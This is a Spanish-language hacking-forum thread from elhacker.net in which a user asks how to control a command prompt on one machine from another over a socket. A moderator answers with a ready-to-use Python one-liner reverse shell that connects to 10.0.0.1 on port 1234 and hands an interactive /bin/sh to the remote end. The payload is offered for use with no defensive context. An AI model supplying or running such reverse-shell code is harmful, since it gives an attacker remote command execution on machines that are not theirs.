elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [PYTHON] Stream cmd con socket
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [PYTHON] Stream cmd con socket  (Leído 2,091 veces)
Sentex

Desconectado Desconectado

Mensajes: 87


Programador


Ver Perfil WWW
[PYTHON] Stream cmd con socket
« en: 9 Junio 2018, 14:38 pm »

Buenas.

Tengo una duda desde hace muchísimo tiempo y es como puedo crear una cmd en un ordenador y controlarla desde otro a a través de socket. No se si me he explicado bien.

Windows 1 - Crear un proceso (cmd) y crear un server con socket.

Ordenador remoto - Conecta con windows y controla la cmd.

No quiero un ejecutor de commandos, quiero tener siempre el mismo proceso pudiendo asi cambiar de directorio, etc..


En línea

Preguntas o peticiones en twitter o discord:

Discord: MrSentex#1227
Twitter: @fbi_sentex
.:UND3R:.
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.118


Ingeniería inversa / MASM


Ver Perfil WWW
Re: [PYTHON] Stream cmd con socket
« Respuesta #1 en: 10 Junio 2018, 04:27 am »

Reverse Shell en Python testeado en sistema Linux:

Código
  1. python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


En línea


Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
Sentex

Desconectado Desconectado

Mensajes: 87


Programador


Ver Perfil WWW
Re: [PYTHON] Stream cmd con socket
« Respuesta #2 en: 10 Junio 2018, 11:50 am »

lo necesito para windows XD
En línea

Preguntas o peticiones en twitter o discord:

Discord: MrSentex#1227
Twitter: @fbi_sentex
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Python] Socket Programming HOWTO
Scripting
Infernal.Root 2 3,055 Último mensaje 6 Marzo 2009, 06:58 am
por asknet
[PYTHON] Ejecutar commando despues de un socket
Scripting
RocKHounD 0 2,341 Último mensaje 3 Marzo 2012, 19:14 pm
por RocKHounD
[Ayuda - Python] Socket
Scripting
Softrix18 2 2,143 Último mensaje 17 Febrero 2013, 01:22 am
por Softrix18
Reanudar conexión socket en Python
Scripting
177600531 5 3,184 Último mensaje 29 Abril 2013, 21:35 pm
por daryo
[Python] Socket + cPickle
Scripting
Softrix18 0 1,703 Último mensaje 2 Octubre 2013, 23:57 pm
por Softrix18
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines